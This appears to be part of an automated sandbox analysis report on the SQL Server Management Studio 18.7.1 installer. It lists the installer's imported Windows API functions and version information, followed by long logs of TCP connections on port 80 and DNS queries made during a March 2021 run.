                                                                                                                                                                KERNEL32.dllGetVersionExW, CompareStringW, VerSetConditionMask, FreeLibrary, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, lstrlenW, GetModuleHandleExW, GetSystemDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetComputerNameW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ExpandEnvironmentStringsW, GetFileAttributesW, ReadFile, SetFilePointerEx, CreateFileW, InterlockedExchange, InterlockedCompareExchange, LoadLibraryW, lstrlenA, RemoveDirectoryW, CreateEventW, OutputDebugStringW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, WriteFile, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, FindClose, SetFileAttributesW, FindFirstFileW, FindNextFileW, GetModuleHandleW, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, DuplicateHandle, CreateProcessW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CreateFileA, CompareStringA, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, VirtualAlloc, VirtualFree, GetSystemTimeAsFileTime, DeleteFileW, GetThreadLocale, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, CloseHandle, Sleep, ReleaseMutex, DeleteCriticalSection, InitializeCriticalSection, GetLastError, GetTimeZoneInformation, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, HeapFree, RaiseException, HeapAlloc, IsProcessorFeaturePresent, IsDebuggerPresent, TerminateProcess, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, MoveFileExW, CopyFileW, RtlUnwind, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCurrentThreadId, GetCurrentProcess, LocalFree, HeapSetInformation, LoadLibraryExW, SetEvent, HeapReAlloc, HeapSize, LCMapStringW, SetStdHandle, WriteConsoleW, FlushFileBuffers, SetFilePointer, GetLocalTime, FormatMessageW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, GetModuleHandleA, GlobalAlloc, GetCurrentProcessId, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, GetFileType, GetProcessHeap, GetModuleFileNameW, GetStdHandle, GetFileSizeEx, MultiByteToWideChar, ExitProcess, DecodePointer, GetCommandLineW, SetLastError, EncodePointer, GlobalFree
                                                                                                                                                                Cabinet.dll
                                                                                                                                                                CRYPT32.dllCertGetCertificateContextProperty, CryptHashPublicKeyInfo
                                                                                                                                                                msi.dll
                                                                                                                                                                RPCRT4.dllUuidCreate
                                                                                                                                                                WININET.dllHttpQueryInfoW, InternetOpenW, InternetCloseHandle, InternetConnectW, InternetReadFile, InternetSetOptionW, HttpOpenRequestW, HttpAddRequestHeadersW, HttpSendRequestW, InternetErrorDlg, InternetCrackUrlW
                                                                                                                                                                WINTRUST.dllWTHelperGetProvSignerFromChain, CryptCATAdminCalcHashFromFileHandle, WTHelperProvDataFromStateData, WinVerifyTrust
                                                                                                                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW

                                                                                                                                                                Version Infos

                                                                                                                                                                DescriptionData
                                                                                                                                                                LegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.
                                                                                                                                                                InternalNamesetup
                                                                                                                                                                FileVersion15.0.18358.0
                                                                                                                                                                CompanyNameMicrosoft Corporation
                                                                                                                                                                ProductNameMicrosoft SQL Server Management Studio - 18.7.1
                                                                                                                                                                ProductVersion15.0.18358.0
                                                                                                                                                                FileDescriptionMicrosoft SQL Server Management Studio - 18.7.1
                                                                                                                                                                OriginalFilenameSSMS-Setup-ENU.exe
                                                                                                                                                                Translation0x0409 0x04e4

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Mar 7, 2021 19:21:07.810911894 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:07.859404087 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.859560966 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:07.875020027 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:07.875263929 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:07.923422098 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.923474073 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.938493967 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.938528061 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.938553095 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.938572884 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.938590050 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.938591003 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:07.938617945 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.103743076 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.161528111 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.161767960 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.209958076 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.210005999 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.215107918 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.215140104 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.215157032 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.215173006 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.215186119 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.215280056 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.584676027 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.584753990 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.633198977 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.633498907 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.636893988 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.636929035 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.637048960 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.637360096 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.637401104 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.637506008 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:08.638473034 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.791378021 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:12.417787075 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:12.467154026 CET8049719104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:12.467298031 CET4971980192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:13.106719017 CET4972280192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:13.154736996 CET8049722104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.154973030 CET4972280192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:13.183574915 CET4972280192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:13.183664083 CET4972280192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:13.231616974 CET8049722104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.231636047 CET8049722104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.254826069 CET8049722104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.254952908 CET8049722104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.255040884 CET4972280192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:13.255119085 CET8049722104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.255242109 CET8049722104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.255326033 CET4972280192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:13.255342960 CET8049722104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.401014090 CET4972280192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:15.721558094 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:15.769937992 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.770029068 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:15.779908895 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:15.779951096 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:15.828363895 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.828388929 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.858582020 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.858613014 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.858638048 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.858658075 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.858671904 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.858769894 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:15.858797073 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:16.982753038 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:17.031280994 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:17.033010960 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:17.033041954 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:17.035136938 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:17.081454039 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:17.083327055 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:17.099524975 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:17.099549055 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:17.099570036 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:17.099590063 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:17.099601030 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:17.099652052 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:17.099654913 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:17.215106010 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:18.024072886 CET4972280192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:21.726310015 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:21.726397991 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:21.776824951 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.776845932 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.782521009 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.782608032 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.782649040 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.782675982 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:21.782685995 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.782716036 CET8049725104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.782735109 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:21.901729107 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:26.871751070 CET4972580192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:26.895971060 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:26.896104097 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:26.944283009 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.944304943 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950754881 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950779915 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950814962 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950838089 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950851917 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950875044 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:26.950927019 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.087616920 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.087721109 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.136095047 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.136147976 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143291950 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143326998 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143460989 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.143744946 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143767118 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.143883944 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.144762039 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.370956898 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.347409010 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.347574949 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.395895958 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.401530027 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.401566982 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.401665926 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.401977062 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.402005911 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.402090073 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.403023958 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.558625937 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.563278913 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.563522100 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.612205982 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.615767956 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.615793943 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.615925074 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.616266012 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.616292000 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.616373062 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.617994070 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.667980909 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.757026911 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.808964968 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.808993101 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.809115887 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.809490919 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.809514046 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.810456991 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.810494900 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:28.871120930 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.330152988 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.330271959 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.379878044 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.383521080 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.383543015 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.383660078 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.384035110 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.384054899 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.384154081 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:31.385025978 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.558842897 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:38.158241034 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.206682920 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.206789017 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.209012032 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.257576942 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272218943 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272244930 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272260904 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272277117 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272289038 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.272330046 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.272370100 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.272598028 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:38.321568966 CET8049728104.21.6.78192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.321639061 CET4972880192.168.2.5104.21.6.78
                                                                                                                                                                Mar 7, 2021 19:21:41.877290010 CET4972380192.168.2.5172.67.134.157

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Mar 7, 2021 19:20:54.576072931 CET6173353192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:20:54.621644974 CET53617338.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:20:55.236800909 CET6544753192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:20:55.282831907 CET53654478.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:20:56.381069899 CET5244153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:20:56.432080984 CET53524418.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:20:57.388458014 CET6217653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:20:57.444344997 CET53621768.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:00.752413034 CET5959653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:00.809860945 CET53595968.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:02.000878096 CET6529653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:02.047022104 CET53652968.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:03.676139116 CET6318353192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:03.721868992 CET53631838.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:05.841875076 CET6015153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:05.888657093 CET53601518.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.216049910 CET5696953192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:07.262129068 CET53569698.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.589586973 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:07.649286032 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.658513069 CET5475753192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:07.716602087 CET53547578.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:07.727015972 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:07.783638954 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.009263992 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:08.063546896 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.079137087 CET5501653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:08.136688948 CET53550168.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.392529964 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:08.434578896 CET5712853192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:08.441195965 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.480477095 CET53571288.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:08.508393049 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:08.568207026 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:09.942194939 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:09.987989902 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:11.333648920 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:11.383660078 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:11.647021055 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:11.702745914 CET53585308.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:13.030141115 CET5381353192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:13.084464073 CET53538138.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.486093998 CET6373253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:15.557291031 CET53637328.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.573966026 CET5734453192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:15.629158020 CET53573448.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:15.640500069 CET5445053192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:15.694534063 CET53544508.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:16.770473957 CET5926153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:16.824945927 CET53592618.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:16.848397017 CET5715153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:16.894583941 CET53571518.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:16.907010078 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:16.968422890 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.428564072 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:21.486051083 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.586539984 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:21.641230106 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:21.657404900 CET6508653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:21.714823961 CET53650868.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.773996115 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:26.832304955 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.839376926 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:26.893809080 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.966716051 CET6431753192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:27.026211023 CET53643178.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.033440113 CET6100453192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:27.084645987 CET53610048.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.205749989 CET5689553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.251885891 CET53568958.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.292393923 CET6237253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.344765902 CET53623728.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.447313070 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.493319988 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.500910044 CET5667553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.558232069 CET53566758.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.624905109 CET5717253192.168.2.58.8.8.8
